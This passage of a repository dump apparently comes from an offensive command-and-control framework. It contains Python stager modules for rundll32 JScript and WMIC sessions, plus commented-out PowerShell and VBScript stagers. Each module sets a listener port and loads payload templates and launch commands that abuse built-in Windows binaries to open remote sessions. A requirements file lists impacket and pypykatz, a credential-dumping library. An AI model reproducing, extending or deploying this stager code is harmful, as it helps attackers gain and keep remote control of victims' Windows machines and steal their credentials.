RunDLL32JSStager(core.stager.StagerWizard): 5 | 6 | NAME = "JScript rundll32.exe JavaScript Stager" 7 | DESCRIPTION = "Listens for new sessions, using JavaScript for payloads" 8 | AUTHORS = ['zerosum0x0'] 9 | 10 | WORKLOAD = "js" 11 | 12 | def load(self): 13 | #self.options.set("SRVPORT", 9997) 14 | self.port = 9997 15 | 16 | self.stdlib = core.loader.load_script('data/stager/js/stdlib.js') 17 | self.stage = core.loader.load_script('data/stager/js/stage.js') 18 | self.stagetemplate = b"~SCRIPT~" 19 | self.stagecmd = core.loader.load_script("data/stager/js/rundll32_js/rundll32_js.cmd") 20 | self.forktemplate = core.loader.load_script("data/stager/js/mshta/template.hta") 21 | self.forkcmd = core.loader.load_script("data/stager/js/rundll32/rundll32.cmd") 22 | self.workload = "js" 23 | -------------------------------------------------------------------------------- /modules/stager/js/wmic.py: -------------------------------------------------------------------------------- 1 | import core.stager 2 | import core.loader 3 | 4 | class WMICStager(core.stager.StagerWizard): 5 | 6 | NAME = "JScript WMIC Stager" 7 | DESCRIPTION = "Listens for new sessions, using WMIC for payloads" 8 | AUTHORS = [ 9 | 'subTee', # discovery 10 | 'mattifestation', #discovery 11 | 'zerosum0x0' # stager 12 | ] 13 | 14 | WORKLOAD = "js" 15 | 16 | def __init__(self, shell): 17 | super(WMICStager, self).__init__(shell) # stupid hack inc! 
18 | self.options.set("ENDPOINTTYPE", ".xsl") 19 | 20 | def load(self): 21 | #self.options.set("SRVPORT", 9998) 22 | self.port = 9996 23 | 24 | self.stdlib = core.loader.load_script('data/stager/js/stdlib.js') 25 | self.stage = core.loader.load_script('data/stager/js/stage.js') 26 | self.stagetemplate = core.loader.load_script("data/stager/js/wmic/template.xsl") 27 | self.stagecmd = core.loader.load_script("data/stager/js/wmic/wmic.cmd") 28 | self.forktemplate = self.stagetemplate 29 | self.forkcmd = self.stagecmd 30 | self.workload = "js" 31 | -------------------------------------------------------------------------------- /modules/stager/powershell.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import core.stager 4 | import random 5 | 6 | """ 7 | class PowerShellStager(core.stager.Stager): 8 | 9 | NAME = "PowerShell Stager" 10 | DESCRIPTION = "Listens for new sessions, using PowerShell for payloads" 11 | AUTHORS = ['RiskSense, Inc.'] 12 | 13 | def run(self): 14 | payloads = {} 15 | payloads["In Memory"] = self.load_file("data/stager/powershell/memory.cmd") 16 | 17 | self.start_server(payloads) 18 | 19 | def stage(self, server, handler, session): 20 | script = self.load_script("data/stager/powershell/payload.ps1") 21 | handler.send_ok(script) 22 | """ 23 | -------------------------------------------------------------------------------- /modules/stager/vbscript.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import core.stager 4 | from core.payload import Payload 5 | import random 6 | 7 | """ 8 | class VBScriptStager(core.stager.Stager): 9 | 10 | NAME = "VBScript Stager" 11 | DESCRIPTION = "Listens for new sessions, using VBScript for payloads" 12 | AUTHORS = ['RiskSense, Inc.'] 13 | 14 | # the type of job payloads 15 | WORKLOAD = "vbs" 16 | 17 | def run(self): 18 | payloads = [] 19 | payloads.append(Payload("In Memory 
(Windows 2000 SP3+)", self.load_file("data/stager/vbscript/mshta.cmd"))) 20 | payloads.append(Payload("On Disk (All Windows)", self.load_file("data/stager/vbscript/disk.cmd"))) 21 | 22 | self.start_server(payloads) 23 | 24 | def stage(self, server, handler, session, options): 25 | script = self.load_script("data/stager/vbscript/work.vbs", options, True, False) 26 | handler.reply(200, script) 27 | 28 | def job(self, server, handler, session, job, options): 29 | script = self.load_script("data/stager/vbscript/job.vbs", options) 30 | handler.reply(200, script) 31 | """ 32 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | impacket 2 | pycrypto 3 | pyasn1 4 | tabulate 5 | rjsmin 6 | pypykatz 7 | --------------------------------------------------------------------------------